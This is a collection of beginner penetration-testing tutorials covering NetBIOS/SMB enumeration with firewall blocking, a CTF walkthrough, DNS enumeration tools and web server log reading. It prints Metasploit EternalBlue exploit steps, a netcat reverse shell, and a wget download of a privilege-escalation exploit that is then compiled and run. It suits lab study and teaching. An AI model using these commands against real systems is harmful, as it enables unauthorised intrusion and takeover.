Beginner Guide NetBIOS and SMB Enumeration on Windows

NETBIOS (Network Basic Input/output System)

NETBIOS is a service which allows communication between applications such as printer or other computer in Ethernet or token ring network via NETBIOS name.

NETBIOS name is 16 digits long character assign to a computer in workgroup by WINS for name resolution of an IP address into NETBIOS name.

Workgroup VS Domain

Workgroup: It is a peer to peer network for maximum 10 computers in same LAN or subnet. It has no Centralized Administration, which means no computer has control over another computer. Each user controls the resources and security locally on their system.

Domain: It is a client/server network for up to 2000 computers anywhere in the world. The administrator manages the domain and its users and resources. A user with an account on the domain can log onto any computer system, without having the account on that computer.

NetBIOS provides three distinct services:

1.       Name service (NetBIOS-NS) for name registration and resolution via port 137.

2.       Datagram distribution service (NetBIOS-DGM) for connectionless communication via port 138.

3.       Session service (NetBIOS-SSN) for connection-oriented communication via port 139.

Port	Protocol	Service
135	TCP	MS-RPC endpoint mapper
137	UDP	NetBIOS Name Service
138	UDP	NetBIOS Datagram Service
139	TCP	NetBIOS Session Service
445	TCP	SMB Protocol

Port 135: it is used for Microsoft Remote Procedure Call between client and server to listen the query of client. Basically it is used for communication between client- client and server -client for sending messages.

Port 137: the name service operates on UDP port 137. The name service primitives offered by NetBIOS are:

·         Add name - registers a NetBIOS name.

·         Add group name - registers a NetBIOS "group" name.

·         Delete name - un-registers a NetBIOS name or group name.

·         Find name - looks up a NetBIOS name on the network.

Port 138: Datagram mode is connectionless; the application is responsible for error detection and recovery. In NBT, the datagram service runs on UDP port 138.The datagram service primitives offered by NetBIOS are:

·         Send Datagram - send a datagram to a remote NetBIOS name.

·         Send Broadcast Datagram - send a datagram to all NetBIOS names on the network.

·         Receive Datagram - wait for a packet to arrive from a Send Datagram operation.

·         Receive Broadcast Datagram - wait for a packet to arrive from a Send Broadcast Datagram operation.

Port 139: Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT, the session service runs on TCP port 139.

The session service primitives offered by NetBIOS are:

·         Call - opens a session to a remote NetBIOS name.

·         Listen - listen for attempts to open a session to a NetBIOS name.

·         Hang Up - close a session.

·         Send - sends a packet to the computer on the other end of a session.

·         Send No Ack - like Send, but doesn't require an acknowledgment.

·         Receive - wait for a packet to arrive from a Send on the other end of a session.

Port 445: It is used for SMB protocol (server message block) for sharing file between different operating system i.e. windows-windows, Unix-Unix and Unix-windows.

For mail details read our previous article given below:-

·         Penetration Testing in SMB Protocol using Metasploit

·         4 Ways to Hack SMB Login Password

·         4 ways to Connect Remote PC using SMB Port

·         Hack Remote Windows PC using DLL Files (SMB Delivery Exploit)

Scanning open port for NETBIOS Enumeration

We are using nmap for scanning target network for open TCP and UDP ports and protocol.

nmap -sT -sU 192.168.1.128

From given image you can see that from result of scan we found port 137 is open for NetBIOS name services, moreover got MAC address of target system.

What will happen if admin has shares a folder in a network?

Suppose we had given share permission to a specific folder (for example ignite as shown in given image) so that we can share that folder with other user in local network then which port will involve in this process.

Now you can observe that we have got a link for our share folder. Using that link anyone can access this folder in that network, hence it means now a new port must be activated for establish connection in order to access share folder on another system, let find out it.

Now again taking the help of nmap for scanning the target one more time.

nmap -sT -sU 192.168.1.128

From result of scanning you can observe that after sharing a folder we found port 135, 139 and 445 get activated.

Hence only by sharing a single folder in network, three ports get opened simultaneously in target system for communication with other system.

Through computer > property, user can view basic information about their computer.

As you can perceive we are sharing the image of victims control panel home which is showing his system basic information such as computer name, workgroup and etc.

Same information can be enumerated with another system in that network using following command:

nbtstat -a 192.168.1.128

Hence you can read the information from inside NetBIOS remote machine name table we had enumerated same information as shown in above image.

Apply filter on port 135-139 with firewall

For increasing security of your system in your local network you can add filter on port 137 with help of window firewall. Because port series from 135 to 139 are most vulnerable therefore administrator can block either whole series or specific port.

Select Inbound Rules and click on New Rule.

Select radio button for port which will create a new rule that control connections for a TCP or UDO port.

Then click on next.

Select UDP port to apply rule on it.

Edit port 137 as specific local port then click on next. Here you can add complete series also for example: 135,137,138,139.

Choose Block the connection as action to be taken when a connection matches the specified condition.

Hence it will not allow traffic on port 137 for communication as a result if attacker will scan victim system he will not able to find the NetBIOS name of target system.

Click on next.

At last provide caption to your new rule of your choice (as show in image block nbtsat) and then click on Finish and you will see the new will be added into window firewall.

Now scan target system using previous command

nbtstat -a 192.168.1.128

This time it will not give any information related to NetBIOS. Form given image you can read the message “Host is not found.

Now let’s try to access share folder of target (192.168.1.128)when port 137 is blocked by him and figure out whether we can able to access the share folder “ignite” or not, using run command prompt.

 From given image you can see that we are able to access to ignite folder even after the port 137 has been blocked by admin in his network.

Conclusion: Although port 137 was block but still sharing was possible due to running protocol on port 139 and 445. Hence by blocking 137 admin has added a security level that will hide NetBIOS name of his system (192.168.1.128) in local network.

Block port 139

Similarly again use firewall inbound rule to block port 139, so that we can verify its impact on sharing information between two or more system. This will add a new in firewall to stop the traffic coming on port 139.

Now again  let’s try to access share folder of target (192.168.1.128)when port 137 and 139 both are blocked by him and figure out whether we can able to access the share folder “ignite” or not, using run command prompt.

 From given image you can see that we are able to access to ignite folder when the port 139 has been blocked by admin in his network.

Conclusion: Although port 137 and 139 both were blocked but still sharing was possible due to running protocol on port 445. Hence by blocking 139 admin has added a security level that will prevent NetBIOS session service as well as prevent NetBIOS enumeration.

Mainly in many origination port serious from 135 to139 are blocked in network for security reasons, therefore port 445 is used for sharing data in network.  Now identify whether it is vulnerable to MS17-010 using metasploit as show in given image.

Use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.28

msf auxiliary(smb_ms17_010) > set port 445

msf auxiliary(smb_ms17_010) >  exploit

From result we found host is vulnerable to MS17-010, hence we can exploit the target easily.

For more scanning method read our previous article from here.

use exploit/windows/smb/ms17_010_eternalblue

msf exploit(ms17_010_eternalblue) >set rhost 192.168.1.1.128

msf exploit(ms17_010_eternalblue) >set rhost 445

msf exploit(ms17_010_eternalblue) >set lhost 192.168.1.115

msf exploit(ms17_010_eternalblue) > exploit

This will exploit target system and give meterpreter session of targeted system as shown in given image.

Conclusion: Enumeration plays an important role in network penetration testing because it will fetch out hidden information of victim’s system as well as identify the weakness that may help in exploiting the system. 

Hack the 64days VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge known as 6days. The credit for making this vm machine goes to “CanYouPwn.Me” and it is another boot2root challenge where we have to execute flag file to complete the challenge. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover

Use nmap for port enumeration

nmap –sV  192.168.0.18

We find port is open so we open this ip on our browser.

This page maybe vulnerable to SQL injection but a WAF is implemented to protect it. So we take a look at the source at the source code for further information.

We find that this page maybe vulnerable to LFI and RFI so we use curl to implement our attack.

We find that LFI is working on this site. Now we take a look at the config file to find the name of the database.

Taking a look at the config file we found that it accessible through localhost. So we use SQL injection with LFI to access the database. Port 80 had WAF so we use 8080 to access the localhost.

We find a username and password.  We know that ssh is open so we try this username and password to login through ssh.

ssh andrea@192.168.0.18

Now we are connected through ssh, but when we try to run commands it seems like no command is working. It is possible that output is redirected to null. So we use netcat to get a reverse shell

We set up a listener on our system first.

nc –lvp  1234

No we try to connect using netcat reverse shell

nc –e /bin/sh 192.168.0.18 1234 

When we got the shell we see that we can see the output of the commands. We also find that the OS is Ubuntu 12.04 that is vulnerable to overlays exploit.

So we move to /tmp/ folder and download overlays exploit and save it as exploit.c

cd /tmp/

wget https://www.exploit-db.com/download/37292  --no-check-certificate

mv 37292 exploit.c

We compile the file and save it as exploit. We give it executable permission then run the file.

gcc –o exploit exploit.c

chmod 777 exploit

./exploit

Now we have root access. When we go back we find an executable file called flag.

When we run the executable file it shows us a congratulation message stating we completed the challenge.

4 Ways to DNS Enumeration

Today we are going to perform DNS enumeration with Kali Linux platform only. It has in-built tool for DNS enumeration. For this tutorial you must be aware of DNS server and its records, if you are not much aware of DNS then read our previous article “Setup DNS Penetration Testing Lab on Windows Server 2012”.

Nmap

Following command will try to discover hosts' services using the DNS Service Discovery protocol. It sends a multicast DNS-SD query and collects all the responses.

The script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a follow up query for each one to try to get more information.

nmap --script=broadcast-dns-service-discovery.

From given screenshot you can observe the running service on a DNS server.

Following command will try to enumerate DNS hostnames by brute force guessing of common subdomains. With the dns-brute.srvargument, dns-brute will also try to enumerate common DNS SRV records.

Wildcard records are listed as "*A" and "*AAAA" for IPv4 and IPv6 respectively.

nmap -T4-p 53 --script dns-brute www.hackingarticles.in

From screenshot you can observe DNS hostname

By default, the DNS server performs recursive queries on behalf of its DNS clients and DNS servers that have forwarded DNS client queries to it

Attackers can use recursion to deny the DNS Server service. Therefore, if a DNS server in your network is not intended to receive recursive queries, recursion should be disabled on that server

Following command will Checks if a DNS server allows queries for third-party names. It is expected that recursion will be enabled on your own internal nameservers.

From https://technet.microsoft.com

Nmap -Pn -sU -p 53 --script=dns-recursion 192.168.1.150

As result you can observe that recursion is enable on targeted system

Following command will enumerates various common service (SRV) records for a given domain name. The service records contain the hostname, port and priority of servers for a given service. The following services are enumerated by the script: - Active Directory Global Catalog - Exchange Autodiscovery - Kerberos KDC Service - Kerberos Passwd Change Service - LDAP Servers - SIP Servers - XMPP S2S - XMPP C2S

nmap --script dns-srv-enum --script-args "dns-srv-enum.domain=’google.com’

DNSEnum

Multithreaded perl script to enumerate DNS information of a domain and to discover non-contiguous ip blocks.

OPERATIONS:

·         Get the host’s addresse (A record).

·         Get the namservers (threaded).

·         Get the MX record (threaded).

·         Perform axfr queries on nameservers and get BIND VERSION (threaded).

·         Get extra names and subdomains via google scraping (google query = “allinurl: -www site:domain”).

·         Brute force subdomains from file, can also perform recursion on subdomain that have NS records (all threaded).

·         Calculate C class domain network ranges and perform whois queries on them (threaded).

·         Perform reverse lookups on netranges ( C class or/and whois netranges) (threaded).

·         Write to domain_ips.txt file ip-blocks.

Following command will avoid enumeration of reverse lookup and save the output result into xml format.

dnsenum --noreverse -o mydomain.xml hackingarticles.in

DNSRecon

DNSRecon provides the ability to perform:

1.       Check all NS Records for Zone Transfers

2.       Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT)

3.       Perform common SRV Record Enumeration. Top Level Domain (TLD) Expansion

4.       Check for Wildcard Resolution

5.       Brute Force subdomain and host A and AAAA records given a domain and a wordlist

6.       Perform a PTR Record lookup for a given IP Range or CIDR

7.       Check a DNS Server Cached records for A, AAAA and CNAME Records provided a list of host records in a text file to check

8.       Enumerate Common mDNS records in the Local Network Enumerate Hosts and Subdomains using Google

Following command will enumerate DNS record of targeted website

dnsrecon-d hackingarticles.in

You can observe the result from given below image.

Fierce

Fierce is a reconnaissance tool. Fierce is a PERL script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics.

Type following command for DNS enumeration on targeted website

Fierce-dns hackingarticles.in

From screenshot you can see that we have scanned almost same result as from above tools.

Understanding Log Analysis of Web Server

Logs

Log files are a standard tool for computer systems developers and administrators. They record the (W5) "what happened when by whom, where and why happened" of the system. This information can record faults and help their diagnosis.

Log Format

The Common Log Format also known as the NCSA Common log format. Each line in a file stored in the Common Log Format has the following syntax:

[host; ident; authuser; date; request; status; bytes]

Example

127.0.0.1 user-identifier raj [30/Aug/2017:10:25:16 -0700] "GET /apache_pb.gif HTTP/1.0" 200 1068

1.       A "-" in a field indicates missing data.

2.       127.0.0.1 is the IP address of the client (remote host) which made the request to the server.

3.       User-identifier is the RFC 1413 identity of the client.

4.       raj is the user id of the person requesting the document.

5.       [30/Aug/2017:10:25:16 -0700] is the date, time, and time zone that the request was received

6.       "GET /apache_pb.gif HTTP/1.0" is the request line from the client.

7.       200 is the HTTP status code returned to the client. 2xx is a successful response, 3xx a redirection, 4xx a client error, and 5xx a server error.

8.       2326 is the size of the object returned to the client, measured in bytes

Importance of log analysis

Logs play an important role in tracking each client computer's activity and its communication with other computers and networks. Network or system administrator analysis log in order to keep an eye on your network for vulnerabilities that may enter in network to access sensitive information in the form of security attacks. You might be able to identify who introduces risks, and help that person to use better precautions.

Location of log files

Generally in Linux or UNIX system logs are created under /var/log directory, here you will find some very important log file such as: apache, auth, mysql, kernel, bootstrap, dmeg, apt and etc.

Some Important Types of Logs

Application log

The Application log contains events logged by applications or programs. For example, a database program might record a file error in the application log.

Apache: /var/log/apache

Samba:  /var/log/samba

Mail: /var/log/

Mysql:  /var/log/

For Example let’s consider apache log files for analyzing its logs, there are two types of apache http server log files:

·         Apache Access Log File

Apache server records all incoming requests and all requests processed to a log file. Location and content of the access log /var/log/apache/access.log.

·         Apache Error Log File

All apache errors information those are found during server requests are logged to this file. Location of error log /var/log/apache/error.log

Now open apache2 log using following command in terminal (UNIX system).

cd apache2

ls

You can see all log files of apache2 as shown in given image.

echo>access.log

Using echo command I had deleted all previous logs from inside access.log file, so that we can read our recent logs for current activity.

As I had described above that apache2 will create logs for client activities on browser. Therefore I had opened some web application like: dvwa, bwapp and wordpress site in respective order and as result in same order log will be created inside apache2.

There are so many command and tools used for log analyzing; among them we had use only three command line utility cat, head and tail for reading logs. 

From given image you can see we have used cat command to read log which begins with dvwa’s log and end on wordpress’s log.

Cat is standard UNIX utility use for reading content of file. With help of cat command you can view whole content inside any log file.

Syntax: cat [options] file name

cat access.log

Head is a program on UNIX and Unix-like systems used to display the beginning of a text file.

Syntax: head [options] file name

head access.log

By default, head will print the first 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: head - n 30 file name.

Tail is a program on UNIX and Unix-like systems used to display the tail end of a text file.

Syntax: tail [options] file name 

tail access.log

From given image you can perceive that it has shown log for wordpress at the end of file.

Significant way of reading logs

Since tail reads end lines of log file which consist information of recent activity of the client therefore we are going to take help tail’s option for reading log in a significant way.

By default, tail will output the last 10 lines of its input to the standard output. Hence you can option [-n] for specific numbers of line. For example: tail - n 30 file name.

tail -n 2 access.log

From given image you can see above command applied filter and read only two logs from recent records.

 If you want to read multiple log files simultaneously then type following command.

tail -n 2 access.log error.log

From given image you can observe that it has shown two-two logs for each i.e. access log and error log.

Now apply filter using grep command with tail command for specific records of log.

Syntax: tail [option] file name | grep “string” [option]

Tail access.log | grep 200

From given image you can notice, it has highlighted log having string as 200.  Generally for a network administrator this command will reduce his/her effort while log analyzing because he/she can directly read those log where client or attacker has got successfully response from server.

When server is not able to give reply of request made by client it response through error 404 “not found”.

tail access.log | grep 404

From given image you can see it has highlighted log string 404 from set of log records.

As you known on browser we had browsed web application dvwa, bwapp and wordpress as respective sequences, therefore we get their log in same sequence dvwa log at top; bwapp log at middle and wordpress log at the end of access.log file

Log files are very large, reading them at ones will not possible for administrator therefore he/she can use after and before option with grep as filter for logs.

Syntax: tail [option] file name | grep -A [number of lines] “string”

tail access.log | grep -A 2 “bwapp”

Here -A stand for after, therefore it will filter 2 logs created after bwapp logs and hence it will indicates 2 logs of wordpress as shown in given image.

Similarly apply filter using before parameter and type following command with specific argument.

tail access.log | grep -B 2 “wordpress”

Here -B stand for before, therefore it will filter 2 logs created before wordpress logs and hence it will indicates 2 logs of bwapp as shown in given image.

Auth Log

Auth.log file holds system authorization information; including user login attempts either successful or failure both type of log records as well as authentication method that were used for establishing connection with server, for example SSH login between server and client

Location: /var/log

Again I had used echo command to remove all previous record from inside auth.log

echo>auth.log

Suppose client uses putty for ssh login into server.

If the client having valid credential for ssh then he will get successfully login into server. From given image you can see I had successfully login into server. Hence inside server auth.log file, it will create a new record for SSH login successful.

While in next image you can read access denied message which means fail in login into SSH server. Hence this time inside auth log again a new record will be create for SSH login failure.

Now let‘s read the whole records of auth log file for above client activities using cat command.

cat auth.log

From given image you can read the logs for successful and failure login.

Vsftpd Log

Vsftd log holds system authentication log for FTP login records either successful or failure.

Location: /var/log

I had deleted all previous logs using echo command and using WinSCP for FTP server login. You can observe that we had login successfully. Hence it will create a new record in vsftpd.log for client login successfully.

Now let’s verify it though vsftpd log file and use cat command for reading whole file. From given image you can observe it has created a record in log file for client 192.168.0.104 is CONNECT.

cat vsftpd.log

System Log

syslog is a standard for system logs or  message logging. Administrator may use syslog for system management and security auditing as well as general informational, analysis, and debugging messages. A wide variety of devices, such as printers, routers, and message receivers across many platforms use the syslog standard.

Location: /var/log

Use cat command for reading syslog as shown in given image.

cat syslog

APT Log

The apt is standard command-line tool in UNIX, which works for performing functions such as installation of new software packages, upgrade of existing software packages, updating of the package list index, and even upgrading the entire Ubuntu system.

Location: /var/log

Hence apt contain its own log file for all new and previous installed software. It has two log file as:

·         History.log : /var/log/apt

·         Term.log /var/log/apt

Now type following command for reading history log of apt.

cat history .log

From given image you can observe the result which contains information of a software installation and updates.

It was a brief theory for reading logs in simplest way…………………………………………..

Source: Wikipedia.org